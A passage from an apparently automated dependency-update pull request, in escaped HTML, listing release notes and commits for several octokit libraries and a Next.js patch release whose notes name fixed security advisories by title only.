/enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e@​octokit/request's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.9\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.8...v10.0.9\"\u003e10.0.9\u003c/a\u003e (2026-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e switch to using the \u0026quot;content-type\u0026quot; package for content type parsing (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/a9f64a01694688cc726f14cc78bcd37a6676f388\"\u003ea9f64a0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/a9f64a01694688cc726f14cc78bcd37a6676f388\"\u003e\u003ccode\u003ea9f64a0\u003c/code\u003e\u003c/a\u003e fix(deps): switch to using the \u0026quot;content-type\u0026quot; package for content type parsin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/4abc2809d2f6255a9bd6458e987c94faacce44e5\"\u003e\u003ccode\u003e4abc280\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency undici to v7.24.0 [security] (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/800\"\u003e#800\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e@​octokit/request-error's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e (2025-11-13)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003einherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e property (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/535\"\u003e#535\u003c/a\u003e/\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/536\"\u003e#536\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e2ea2780\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.1...v7.0.2\"\u003e7.0.2\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003ee5a75ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.0...v7.0.1\"\u003e7.0.1\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/522\"\u003e#522\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/4a453f21afbde9fc19d779518cb8e5f23d05038f\"\u003e4a453f2\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.8...v7.0.0\"\u003e7.0.0\u003c/a\u003e (2025-05-20)\u003c/h1\u003e\n\u003ch3\u003eContinuous Integration\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003estop testing against NodeJS v18 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/512\"\u003e#512\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/8eee0c1eff4f247b714da5db9437787507e124df\"\u003e8eee0c1\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eDrop support for NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ebuild: set minimal node version in build script to v20\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eci: stop testing against NodeJS v18\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v6.1.7...v6.1.8\"\u003e6.1.8\u003c/a\u003e (2025-04-10)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v14 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/505\"\u003e#505\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request-error.js/commit/ab4ea7b81bd8055060bfafa47b7eb13d89c7e475\"\u003eab4ea7b\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev6.1.7\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/2ea27805b93ed21d8cc423a6ad436513ecca0b55\"\u003e\u003ccode\u003e2ea2780\u003c/code\u003e\u003c/a\u003e feat: inherit options from base \u003ccode\u003eError\u003c/code\u003e class to add support for the \u003ccode\u003ecause\u003c/code\u003e ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/ac7b3094475260d5bc95951d2040e38da8e88dd8\"\u003e\u003ccode\u003eac7b309\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/dadc76ddc454c475f07525a8cd96fc29e4353cb1\"\u003e\u003ccode\u003edadc76d\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/f57f2e6b6fdc3578c3484c8939bcf56548b620eb\"\u003e\u003ccode\u003ef57f2e6\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/534\"\u003e#534\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5a75ef9cdede512185df71ffe5117c2b71027a9\"\u003e\u003ccode\u003ee5a75ef\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/e5d5de21540843d46e1dbd15696af8bdff9cf400\"\u003e\u003ccode\u003ee5d5de2\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/8cc127bf725e581cdd32336669d322632e4392b4\"\u003e\u003ccode\u003e8cc127b\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v6 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/b3a876bc68c0d044bf52eeaa513760e362d426e8\"\u003e\u003ccode\u003eb3a876b\u003c/code\u003e\u003c/a\u003e build(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/527\"\u003e#527\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/cf1817b2c1bd15ffbf26bbf4390aa07084a10fce\"\u003e\u003ccode\u003ecf1817b\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request-error.js/commit/61f1e8750fa8c1b7b57f4323ab13b92bb1017cf2\"\u003e\u003ccode\u003e61f1e87\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency tinybench to v5 (\u003ca href=\"https://redirect.github.com/octokit/request-error.js/issues/519\"\u003e#519\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request-error.js/compare/v2.1.0...v7.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 16.2.4 to 16.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev16.2.6\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - \u003cstrong\u003eIncomplete Fix Follow-Up\u003c/strong\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eModerate:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted 